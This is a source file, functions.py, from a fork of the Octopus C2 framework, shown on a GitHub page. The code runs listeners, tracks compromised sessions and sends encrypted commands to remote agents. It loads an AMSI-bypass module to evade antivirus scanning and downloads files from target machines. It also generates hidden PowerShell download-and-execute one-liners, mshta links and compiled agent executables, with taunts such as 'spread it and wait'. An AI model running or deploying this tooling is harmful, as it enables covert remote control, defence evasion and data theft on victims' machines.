forked from mhaskar/Octopus
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfunctions.py
261 lines (221 loc) · 9.01 KB
/
functions.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
#!/usr/bin/python
from tabulate import tabulate
import threading
from flask import *
from termcolor import colored
import logging
import base64
import random
import string
from .encryption import *
from profile import *
import time
import os
requests = []
counter = 1
listener_id = 0
connections_information = {}
listeners_information = {}
commands = {}
key = "".join([random.choice(string.ascii_uppercase) for i in range(32)])
aes_encryption_key = base64.b64encode(bytearray(key, "UTF-8")).decode()
oct_commands = ["help", "exit", "interact", "list", "listeners", "listen_http", "listen_https", "delete", "generate_powershell", "generate_exe","generate_hta", "generate_duckyscript"]
oct_commands_interact = ["load", "help", "exit", "back", "clear", "download", "load", "report", "disable_amsi", "modules"]
def check_url(url):
if len(listeners_information) > 0:
for listener in listeners_information:
if url == listeners_information[listener][5]:
return False
else:
return True
else:
return True
def check_listener_name(listener_name):
if len(listeners_information) > 0:
for listener in listeners_information:
if listener_name == listeners_information[listener][0]:
return False
else:
return True
else:
return True
def list_sessions():
data = []
for key in connections_information:
data.append(connections_information[key])
print(("\n\n" + tabulate(data, ["Session", "IP", "Hostname", "PID", "Username", "Domain", "Last ping", "OS"], "simple") + "\n\n"))
def get_history():
f = open(".console_history.oct", "r")
print((f.read()))
def list_listeners():
data = []
for key in listeners_information:
data.append(listeners_information[key])
# listener_name, ip, port, host, interval, path, listener_name
print(("\n\n" + tabulate(data, ["Name", "IP", "Port", "Host", "Interval", "Path", "SSL"], "simple") + "\n\n"))
def completer(text, state):
options = [i for i in oct_commands if i.startswith(text)]
if state < len(options):
return options[state]
else:
return None
def completer_interact(text, state):
options = [i for i in oct_commands_interact if i.startswith(text)]
if state < len(options):
return options[state]
else:
return None
def send_command(session, command):
encrypted_command = encrypt_command(aes_encryption_key, command)
commands[session] = encrypted_command
print("[+] Command sent , waiting for results")
def delete(hostname, sid):
send_command(hostname, "kill $pid")
time.sleep(5)
commands.pop(hostname)
connections_information.pop(sid)
print(("[+] Session %s killed !"%hostname))
def list_modules():
if os.path.isdir("modules"):
modules = os.listdir("modules")
for module in modules:
oct_commands_interact.append(module)
print(module)
else:
print((colored("[-] modules directory not Available")))
def persistence():
# to do
pass
def load_module(session, module_name):
module = "modules/" + module_name
if os.path.isfile(module):
fi = open(module, "r")
module_content = fi.read()
# encrypt module before send it
base64_command = encrypt_command(aes_encryption_key, module_content)
commands[session] = base64_command
print((colored("[+] Module should be loaded !", "green")))
else:
print((colored("[-] Module is not exist !")))
def disable_amsi(session):
amsi_module = "modules/ASBBypass.ps1"
if os.path.isfile(amsi_module):
fi = open(amsi_module, "r")
module_content = fi.read()
base64_command = encrypt_command(aes_encryption_key, module_content)
commands[session] = base64_command
print((colored("AMSI disable module has been loaded !", "green")))
else:
print((colored("[-] AMSI Module is not exist !")))
def generate(hostname, path, proto, interval):
c = random.choice(string.ascii_lowercase)
print((colored("#====================", "red")))
print(("1) powershell -w hidden " + '"IEX (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');"\n'.format(hostname, path, proto)))
print(("2) powershell -w hidden " + '"Invoke-Expression (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');"\n'.format(hostname, path, proto)))
print(("3) powershell -w hidden " + '"${3} = (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');Invoke-Expression ${3};"\n'.format(hostname, path, proto, c)))
print("Hack your way in ;)")
print((colored("#====================", "red")))
def generate_hta(host_ip, port,proto):
print((colored("#====================", "red")))
print(("mshta " + '{0}://{1}:{2}{3}'.format(proto,host_ip,port, mshta_url)))
print("spread it and wait ;)")
print((colored("#====================", "red")))
def generate_duckyscript(hostname, path, proto, output_path):
# Open the ducky template
# Replace the URL
# Export to file
pass
def generate_exe(hostname, path, proto, output_path):
if os.system("which mono-csc") == 0:
url = "{2}://{0}/{1}".format(hostname, path, proto)
ft = open("agents/octopus.cs")
template = ft.read()
code = template.replace("OCT_URL", url)
f = open("tmp.cs", "w")
f.write(code)
f.close()
compile_command = "mono-csc /reference:includes/System.Management.Automation.dll tmp.cs /out:%s" % output_path
if os.system(compile_command) == 0:
print((colored("[+] file compiled successfully !", "green")))
print((colored("[+] binary file saved to {0}".format(output_path), "red")))
os.system("rm tmp.cs")
else:
print("[-] error while compiling !")
else:
print("[-] mono-csc is not installed !")
def main_help_banner():
print("\n")
print("Available commands to use :\n")
print("Hint : the commands with * have arguments and you can see them by typing the command name only\n")
print("+++++++++")
print("help \t\t\t\tshow this help menu")
print("list \t\t\t\tlist all connected agents")
print("listeners \t\t\tlist all listeners")
print("* generate_powershell \t\tgenerate powershell oneliner")
print("* generate_hta \t\t\tgenerate HTA Link")
print("* generate_exe \t\t\tgenerate executable agent")
print("* listen_http \t\t\tto start a HTTP listener")
print("* listen_https \t\tto start a HTTPS listener")
print("interact {session} \t\tto interact with a session")
print("delete {session} \t\tto delete a session")
print("exit \t\t\t\texit current session")
print("\n")
def http_help_banner():
print("\n##########")
print("Options info : \n")
print("BindIP \t\tIP address that will be used by the listener")
print("BindPort \t\tport you want to listen on")
print("Hostname \t\twill be used to request the payload from")
print("Interval \t\thow may seconds that agent will wait before check for commands")
print("URL \t\t\tpage name will hold the payload")
print("Listener_name \t\tlistener name to use\n")
# certficate_path key_path
def https_help_banner():
print("\n##########")
print("Options info : \n")
print("BindIP \t\tIP that will be used by the listener")
print("BindPort \t\tport you want to listen on")
print("Hostname \t\twill be used to request the payload from")
print("Interval \t\thow may seconds that agent will wait before check for commands")
print("URL \t\t\tpage name will hold the payload")
print("certficate_path \t the full path for the ssl certficate")
print("key_path \t\t the full path for the ssl certficate private key\n")
print("Listener_name \t\tlistener name to use")
def interact_help():
print("\n")
print("Available commands to use :\n")
print("Hint : if you want to execute system command just type it and wait for the results\n")
print("+++++++++")
print("help \t\t\t\tshow this help menu")
print("exit/back \t\t\texit current session and back to the main screen")
print("clear \t\t\t\tclear the screen output")
print("download \t\t\tdownload file from the target machine")
print("load \t\t\t\tload powershell module to the target machine")
print("disable_amsi \t\t\tdisable AMSI on the target machine")
print("report \t\t\t\tget situation report from the target")
print("\n")
def banner():
# \033[94m
version = '\33[43m V1.0 Beta \033[0m'
Yellow = '\33[33m'
OKGREEN = '\033[92m'
CRED = '\033[91m'
ENDC = '\033[0m'
banner = r'''
{0}
/$$$$$$ /$$
/$$__ $$ | $$
| $$ \ $$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$
| $$ | $$ /$$_____/|_ $$_/ /$$__ $$ /$$__ $$| $$ | $$ /$$_____/
| $$ | $$| $$ | $$ | $$ \ $$| $$ \ $$| $$ | $$| $$$$$$
| $$ | $$| $$ | $$ /$$| $$ | $$| $$ | $$| $$ | $$ \____ $$
| $$$$$$/| $$$$$$$ | $$$$/| $$$$$$/| $$$$$$$/| $$$$$$/ /$$$$$$$/
\______/ \_______/ \___/ \______/ | $$____/ \______/ |_______/
| $$
| $$
|__/
{1}
{3}V1.0 BETA !{1}
{2} Octopus C2 | Control your shells {1}
'''
print((banner.format(CRED, ENDC, OKGREEN, Yellow)))